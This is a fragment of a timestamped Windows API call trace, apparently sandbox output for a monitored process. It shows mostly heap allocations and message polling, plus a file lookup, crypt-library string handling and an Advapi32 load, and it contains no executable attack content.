PeekMessageW (in: lpMsg=0x91faac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91faac) returned 0 [0264.470] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb2f0 [0264.470] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe836e8 [0264.470] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef18c0 [0264.470] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe836e8 | out: hHeap=0xc60000) returned 1 [0264.470] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb318 [0264.470] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe836e8 [0264.470] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe839e8 [0264.470] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef18b0 [0264.470] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe839e8 | out: hHeap=0xc60000) returned 1 [0264.470] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef18b0 | out: hHeap=0xc60000) returned 1 [0264.470] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb340 [0264.470] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe839e8 [0264.470] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef18b0 [0264.470] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83808 [0264.470] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83af0 [0264.470] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef18a0 [0264.471] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83af0 | out: hHeap=0xc60000) returned 1 [0264.471] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef18a0 | out: hHeap=0xc60000) returned 1 [0264.471] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb368 [0264.471] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83af0 [0264.471] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef18a0 [0264.471] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83af0 | out: hHeap=0xc60000) returned 1 [0264.471] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb390 [0264.471] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83af0 [0264.471] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83820 [0264.471] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1890 [0264.471] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83820 | out: hHeap=0xc60000) returned 1 [0264.471] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1890 | out: hHeap=0xc60000) returned 1 [0264.471] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb3b8 [0264.471] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83820 [0264.471] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1890 [0264.471] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe815d0 [0264.471] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe814b0 [0264.471] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1880 [0264.472] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe814b0 | out: hHeap=0xc60000) returned 1 [0264.472] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1880 | out: hHeap=0xc60000) returned 1 [0264.472] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb3e0 [0264.472] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe814b0 [0264.472] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1880 [0264.472] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe814b0 | out: hHeap=0xc60000) returned 1 [0264.472] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb408 [0264.472] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe814b0 [0264.472] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe839d0 [0264.472] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1870 [0264.472] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe839d0 | out: hHeap=0xc60000) returned 1 [0264.473] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1870 | out: hHeap=0xc60000) returned 1 [0264.473] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb430 [0264.473] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe839d0 [0264.473] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1870 [0264.473] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe839d0 | out: hHeap=0xc60000) returned 1 [0264.473] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb458 [0264.473] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe839d0 [0264.473] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83910 [0264.473] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1860 [0264.473] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83910 | out: hHeap=0xc60000) returned 1 [0264.473] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb480 [0264.473] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83910 [0264.473] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1850 [0264.473] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83850 [0264.473] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1850 | out: hHeap=0xc60000) returned 1 [0264.473] FindFirstFileW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\26207383702620738370", lpFindFileData=0x91f4f8 | out: lpFindFileData=0x91f4f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33446080, ftCreationTime.dwHighDateTime=0x1d661be, ftLastAccessTime.dwLowDateTime=0x33446080, ftLastAccessTime.dwHighDateTime=0x1d661be, ftLastWriteTime.dwLowDateTime=0x3346c1e0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x10, dwReserved0=0xd, dwReserved1=0xc675d8, cFileName="26207383702620738370", cAlternateFileName="262073~1")) returned 0xef1c20 [0264.474] FindClose (in: hFindFile=0xef1c20 | out: hFindFile=0xef1c20) returned 1 [0264.474] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83850 | out: hHeap=0xc60000) returned 1 [0264.474] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83910 | out: hHeap=0xc60000) returned 1 [0264.474] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb480 | out: hHeap=0xc60000) returned 1 [0264.474] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1860 | out: hHeap=0xc60000) returned 1 [0264.474] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb480 [0264.475] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83910 [0264.475] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1860 [0264.475] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83850 [0264.475] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81300 [0264.475] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1850 [0264.475] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81300 | out: hHeap=0xc60000) returned 1 [0264.475] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1850 | out: hHeap=0xc60000) returned 1 [0264.475] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb4a8 [0264.475] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81300 [0264.475] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1850 [0264.475] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe814e0 [0264.475] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81420 [0264.475] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1840 [0264.475] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81420 | out: hHeap=0xc60000) returned 1 [0264.475] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1840 | out: hHeap=0xc60000) returned 1 [0264.475] PeekMessageW (in: lpMsg=0x91faac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91faac) returned 0 [0264.475] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1840 [0264.475] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb4d0 [0264.475] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0264.475] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb4d0 | out: hHeap=0xc60000) returned 1 [0264.475] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1840 | out: hHeap=0xc60000) returned 1 [0264.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe81420 [0264.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe8c838 [0264.476] PeekMessageW (in: lpMsg=0x91f854, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f854) returned 0 [0264.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1840 [0264.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1830 [0264.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xee0cb8 [0264.476] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0264.476] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xee0cb8 | out: hHeap=0xc60000) returned 1 [0264.476] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1830 | out: hHeap=0xc60000) returned 1 [0264.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe83760 [0264.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe8c880 [0264.476] PeekMessageW (in: lpMsg=0x91f434, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f434) returned 0 [0264.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1830 [0264.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1820 [0264.476] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1820 | out: hHeap=0xc60000) returned 1 [0264.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81210 [0264.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83718 [0264.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83730 [0264.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1820 [0264.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811e0 [0264.476] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1830 | out: hHeap=0xc60000) returned 1 [0264.476] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81180 [0264.477] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811e0 | out: hHeap=0xc60000) returned 1 [0264.477] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811e0 [0264.477] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81180 | out: hHeap=0xc60000) returned 1 [0264.477] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe8c880 | out: hHeap=0xc60000) returned 1 [0264.477] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83760 | out: hHeap=0xc60000) returned 1 [0264.477] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1830 [0264.477] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xeca7f8 [0264.477] GetLastError () returned 0x0 [0264.477] SetLastError (dwErrCode=0x0) [0264.477] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811e0 | out: hHeap=0xc60000) returned 1 [0264.477] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeca7f8 | out: hHeap=0xc60000) returned 1 [0264.477] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1830 | out: hHeap=0xc60000) returned 1 [0264.477] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1840 | out: hHeap=0xc60000) returned 1 [0264.477] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1c20 [0264.477] PeekMessageW (in: lpMsg=0x91f854, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f854) returned 0 [0264.477] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb4d0 [0264.477] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811e0 [0264.477] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1840 [0264.477] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811e0 | out: hHeap=0xc60000) returned 1 [0264.477] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb4f8 [0264.478] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811e0 [0264.478] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83760 [0264.478] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1830 [0264.478] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83760 | out: hHeap=0xc60000) returned 1 [0264.478] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb520 [0264.478] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83760 [0264.478] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1810 [0264.478] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81180 [0264.478] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1810 | out: hHeap=0xc60000) returned 1 [0264.478] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0264.481] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb548 [0264.481] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1810 [0264.481] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81180 | out: hHeap=0xc60000) returned 1 [0264.481] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83760 | out: hHeap=0xc60000) returned 1 [0264.481] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb520 | out: hHeap=0xc60000) returned 1 [0264.481] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1830 | out: hHeap=0xc60000) returned 1 [0264.481] PeekMessageW (in: lpMsg=0x91f854, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f854) returned 1 [0264.481] TranslateAcceleratorW (hWnd=0x80170, hAccTable=0x150171, lpMsg=0x91f854) returned 0 [0264.481] TranslateMessage (lpMsg=0x91f854) returned 0 [0264.481] DispatchMessageW (lpMsg=0x91f854) returned 0x0 [0264.481] GetForegroundWindow () returned 0x80170 [0264.481] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.481] GetCursorPos (in: lpPoint=0x91f690 | out: lpPoint=0x91f690*(x=890, y=510)) returned 1 [0264.481] ScreenToClient (in: hWnd=0x80170, lpPoint=0x91f690 | out: lpPoint=0x91f690) returned 1 [0264.481] GetAsyncKeyState (vKey=1) returned 0 [0264.481] GetAsyncKeyState (vKey=2) returned 0 [0264.482] PeekMessageW (in: lpMsg=0x91f854, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f854) returned 0 [0264.482] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1830 [0264.482] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1800 [0264.482] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17f0 [0264.482] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xeca7f8 [0264.482] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17f0 | out: hHeap=0xc60000) returned 1 [0264.482] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeca7f8 | out: hHeap=0xc60000) returned 1 [0264.482] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1800 | out: hHeap=0xc60000) returned 1 [0264.482] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1830 | out: hHeap=0xc60000) returned 1 [0264.482] PeekMessageW (in: lpMsg=0x91f854, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f854) returned 0 [0264.482] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1830 [0264.483] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xee0cb8 [0264.483] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0264.483] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xee0cb8 | out: hHeap=0xc60000) returned 1 [0264.483] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1830 | out: hHeap=0xc60000) returned 1 [0264.483] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb520 [0264.483] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1) returned 0xef1830 [0264.483] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb570 [0264.483] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83760 [0264.483] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1800 [0264.483] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1800 | out: hHeap=0xc60000) returned 1 [0264.483] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe81180 [0264.483] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb598 [0264.483] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83688 [0264.483] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1800 [0264.483] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83688 | out: hHeap=0xc60000) returned 1 [0264.483] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb5c0 [0264.483] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83688 [0264.483] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe8c880 [0264.483] PeekMessageW (in: lpMsg=0x91f5fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f5fc) returned 0 [0264.483] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17f0 [0264.484] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17f0 | out: hHeap=0xc60000) returned 1 [0264.484] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe836a0 [0264.484] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81150 [0264.484] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83658 [0264.484] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef17f0 [0264.484] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17e0 [0264.484] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17e0 | out: hHeap=0xc60000) returned 1 [0264.484] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17e0 [0264.484] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17e0 | out: hHeap=0xc60000) returned 1 [0264.484] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83658 | out: hHeap=0xc60000) returned 1 [0264.484] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17f0 | out: hHeap=0xc60000) returned 1 [0264.485] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81150 | out: hHeap=0xc60000) returned 1 [0264.485] PeekMessageW (in: lpMsg=0x91f5fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f5fc) returned 0 [0264.485] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe8c880 | out: hHeap=0xc60000) returned 1 [0264.485] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83688 | out: hHeap=0xc60000) returned 1 [0264.485] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb5c0 | out: hHeap=0xc60000) returned 1 [0264.485] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1800 | out: hHeap=0xc60000) returned 1 [0264.485] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb598 | out: hHeap=0xc60000) returned 1 [0264.485] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81180 | out: hHeap=0xc60000) returned 1 [0264.485] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1830 | out: hHeap=0xc60000) returned 1 [0264.485] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb520 | out: hHeap=0xc60000) returned 1 [0264.485] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83760 | out: hHeap=0xc60000) returned 1 [0264.485] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb570 | out: hHeap=0xc60000) returned 1 [0264.485] PeekMessageW (in: lpMsg=0x91f854, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f854) returned 0 [0264.485] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb570 [0264.485] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83760 [0264.485] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1830 [0264.485] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83760 | out: hHeap=0xc60000) returned 1 [0264.485] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb520 [0264.485] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83760 [0264.485] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81180 [0264.485] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1800 [0264.485] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81180 | out: hHeap=0xc60000) returned 1 [0264.485] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1800 | out: hHeap=0xc60000) returned 1 [0264.486] PeekMessageW (in: lpMsg=0x91f854, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f854) returned 0 [0264.486] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb598 [0264.486] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81180 [0264.486] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1800 [0264.486] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83688 [0264.486] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81150 [0264.486] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17f0 [0264.486] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81150 | out: hHeap=0xc60000) returned 1 [0264.486] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb5c0 [0264.486] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81150 [0264.486] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17e0 [0264.486] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef17d0 [0264.486] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xee0cb8 [0264.486] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.486] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xee0cb8 | out: hHeap=0xc60000) returned 1 [0264.486] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17d0 | out: hHeap=0xc60000) returned 1 [0264.486] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe83658 [0264.486] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe8c880 [0264.486] PeekMessageW (in: lpMsg=0x91f204, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f204) returned 0 [0264.486] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17d0 [0264.486] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef17c0 [0264.487] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17c0 | out: hHeap=0xc60000) returned 1 [0264.487] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef17d0 | out: hHeap=0xc60000) returned 1 [0264.487] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe8c880 | out: hHeap=0xc60000) returned 1 [0264.487] HeapFree 